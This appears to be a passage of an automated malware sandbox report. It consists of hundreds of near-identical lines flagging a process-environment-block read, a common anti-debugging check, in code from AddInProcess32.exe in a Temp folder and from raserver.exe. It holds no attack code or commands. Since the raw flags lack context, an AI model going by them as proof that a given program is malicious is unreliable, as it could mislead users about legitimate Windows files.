          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1C06 mov eax, dword ptr fs:[00000030h]8_2_017F1C06
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F14FB mov eax, dword ptr fs:[00000030h]8_2_017F14FB
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B6CF0 mov eax, dword ptr fs:[00000030h]8_2_017B6CF0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180740D mov eax, dword ptr fs:[00000030h]8_2_0180740D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174849B mov eax, dword ptr fs:[00000030h]8_2_0174849B
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174FF60 mov eax, dword ptr fs:[00000030h]8_2_0174FF60
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174EF40 mov eax, dword ptr fs:[00000030h]8_2_0174EF40
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176E730 mov eax, dword ptr fs:[00000030h]8_2_0176E730
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]8_2_01734F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01734F2E mov eax, dword ptr fs:[00000030h]8_2_01734F2E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175F716 mov eax, dword ptr fs:[00000030h]8_2_0175F716
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]8_2_017CFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFF10 mov eax, dword ptr fs:[00000030h]8_2_017CFF10
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]8_2_0176A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A70E mov eax, dword ptr fs:[00000030h]8_2_0176A70E
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017737F5 mov eax, dword ptr fs:[00000030h]8_2_017737F5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]8_2_0180070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0180070D mov eax, dword ptr fs:[00000030h]8_2_0180070D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01748794 mov eax, dword ptr fs:[00000030h]8_2_01748794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808F6A mov eax, dword ptr fs:[00000030h]8_2_01808F6A
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B7794 mov eax, dword ptr fs:[00000030h]8_2_017B7794
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0175AE73 mov eax, dword ptr fs:[00000030h]8_2_0175AE73
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0174766D mov eax, dword ptr fs:[00000030h]8_2_0174766D
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01800EA5 mov eax, dword ptr fs:[00000030h]8_2_01800EA5
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01747E41 mov eax, dword ptr fs:[00000030h]8_2_01747E41
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAE44 mov eax, dword ptr fs:[00000030h]8_2_017FAE44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017FAE44 mov eax, dword ptr fs:[00000030h]8_2_017FAE44
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EFE3F mov eax, dword ptr fs:[00000030h]8_2_017EFE3F
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173E620 mov eax, dword ptr fs:[00000030h]8_2_0173E620
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01808ED6 mov eax, dword ptr fs:[00000030h]8_2_01808ED6
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]8_2_0176A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0176A61C mov eax, dword ptr fs:[00000030h]8_2_0176A61C
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]8_2_0173C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]8_2_0173C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_0173C600 mov eax, dword ptr fs:[00000030h]8_2_0173C600
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01768E00 mov eax, dword ptr fs:[00000030h]8_2_01768E00
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017F1608 mov eax, dword ptr fs:[00000030h]8_2_017F1608
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017616E0 mov ecx, dword ptr fs:[00000030h]8_2_017616E0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017476E2 mov eax, dword ptr fs:[00000030h]8_2_017476E2
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_01778EC7 mov eax, dword ptr fs:[00000030h]8_2_01778EC7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017636CC mov eax, dword ptr fs:[00000030h]8_2_017636CC
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017EFEC0 mov eax, dword ptr fs:[00000030h]8_2_017EFEC0
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017B46A7 mov eax, dword ptr fs:[00000030h]8_2_017B46A7
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 8_2_017CFE87 mov eax, dword ptr fs:[00000030h]8_2_017CFE87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]15_2_04540050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04540050 mov eax, dword ptr fs:[00000030h]15_2_04540050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]15_2_045BC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BC450 mov eax, dword ptr fs:[00000030h]15_2_045BC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A44B mov eax, dword ptr fs:[00000030h]15_2_0455A44B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F1074 mov eax, dword ptr fs:[00000030h]15_2_045F1074
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E2073 mov eax, dword ptr fs:[00000030h]15_2_045E2073
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454746D mov eax, dword ptr fs:[00000030h]15_2_0454746D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]15_2_045F4015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F4015 mov eax, dword ptr fs:[00000030h]15_2_045F4015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]15_2_045A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]15_2_045A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A7016 mov eax, dword ptr fs:[00000030h]15_2_045A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]15_2_045A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]15_2_045A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]15_2_045A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6C0A mov eax, dword ptr fs:[00000030h]15_2_045A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]15_2_045F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]15_2_045F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F740D mov eax, dword ptr fs:[00000030h]15_2_045F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E1C06 mov eax, dword ptr fs:[00000030h]15_2_045E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]15_2_0455002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]15_2_0455002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]15_2_0455002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]15_2_0455002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455002D mov eax, dword ptr fs:[00000030h]15_2_0455002D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]15_2_0453B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]15_2_0453B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]15_2_0453B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453B02A mov eax, dword ptr fs:[00000030h]15_2_0453B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455BC2C mov eax, dword ptr fs:[00000030h]15_2_0455BC2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8CD6 mov eax, dword ptr fs:[00000030h]15_2_045F8CD6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov ecx, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045BB8D0 mov eax, dword ptr fs:[00000030h]15_2_045BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045E14FB mov eax, dword ptr fs:[00000030h]15_2_045E14FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]15_2_045A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]15_2_045A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6CF0 mov eax, dword ptr fs:[00000030h]15_2_045A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045258EC mov eax, dword ptr fs:[00000030h]15_2_045258EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453849B mov eax, dword ptr fs:[00000030h]15_2_0453849B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529080 mov eax, dword ptr fs:[00000030h]15_2_04529080
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3884 mov eax, dword ptr fs:[00000030h]15_2_045A3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3884 mov eax, dword ptr fs:[00000030h]15_2_045A3884
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov ecx, dword ptr fs:[00000030h]15_2_0455F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov eax, dword ptr fs:[00000030h]15_2_0455F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455F0BF mov eax, dword ptr fs:[00000030h]15_2_0455F0BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045520A0 mov eax, dword ptr fs:[00000030h]15_2_045520A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045690AF mov eax, dword ptr fs:[00000030h]15_2_045690AF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04547D50 mov eax, dword ptr fs:[00000030h]15_2_04547D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454B944 mov eax, dword ptr fs:[00000030h]15_2_0454B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454B944 mov eax, dword ptr fs:[00000030h]15_2_0454B944
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04563D43 mov eax, dword ptr fs:[00000030h]15_2_04563D43
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A3540 mov eax, dword ptr fs:[00000030h]15_2_045A3540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B171 mov eax, dword ptr fs:[00000030h]15_2_0452B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B171 mov eax, dword ptr fs:[00000030h]15_2_0452B171
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C577 mov eax, dword ptr fs:[00000030h]15_2_0454C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C577 mov eax, dword ptr fs:[00000030h]15_2_0454C577
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452C962 mov eax, dword ptr fs:[00000030h]15_2_0452C962
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]15_2_04529100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]15_2_04529100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04529100 mov eax, dword ptr fs:[00000030h]15_2_04529100
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452AD30 mov eax, dword ptr fs:[00000030h]15_2_0452AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04533D34 mov eax, dword ptr fs:[00000030h]15_2_04533D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F8D34 mov eax, dword ptr fs:[00000030h]15_2_045F8D34
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045AA537 mov eax, dword ptr fs:[00000030h]15_2_045AA537
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]15_2_04554D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]15_2_04554D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04554D3B mov eax, dword ptr fs:[00000030h]15_2_04554D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455513A mov eax, dword ptr fs:[00000030h]15_2_0455513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455513A mov eax, dword ptr fs:[00000030h]15_2_0455513A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov eax, dword ptr fs:[00000030h]15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04544120 mov ecx, dword ptr fs:[00000030h]15_2_04544120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov ecx, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A6DC9 mov eax, dword ptr fs:[00000030h]15_2_045A6DC9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045D8DF1 mov eax, dword ptr fs:[00000030h]15_2_045D8DF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]15_2_0452B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]15_2_0452B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0452B1E1 mov eax, dword ptr fs:[00000030h]15_2_0452B1E1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045B41E8 mov eax, dword ptr fs:[00000030h]15_2_045B41E8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E0 mov eax, dword ptr fs:[00000030h]15_2_0453D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0453D5E0 mov eax, dword ptr fs:[00000030h]15_2_0453D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552990 mov eax, dword ptr fs:[00000030h]15_2_04552990
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FD9B mov eax, dword ptr fs:[00000030h]15_2_0455FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455FD9B mov eax, dword ptr fs:[00000030h]15_2_0455FD9B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0455A185 mov eax, dword ptr fs:[00000030h]15_2_0455A185
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]15_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]15_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]15_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04552581 mov eax, dword ptr fs:[00000030h]15_2_04552581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_0454C182 mov eax, dword ptr fs:[00000030h]15_2_0454C182
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]15_2_04522D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]15_2_04522D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]15_2_04522D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]15_2_04522D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04522D8A mov eax, dword ptr fs:[00000030h]15_2_04522D8A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]15_2_04551DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]15_2_04551DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_04551DB5 mov eax, dword ptr fs:[00000030h]15_2_04551DB5
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]15_2_045A51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]15_2_045A51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]15_2_045A51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045A51BE mov eax, dword ptr fs:[00000030h]15_2_045A51BE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F05AC mov eax, dword ptr fs:[00000030h]15_2_045F05AC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045F05AC mov eax, dword ptr fs:[00000030h]15_2_045F05AC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 15_2_045535A1 mov eax, dword ptr fs:[00000030h]15_2_045535A1
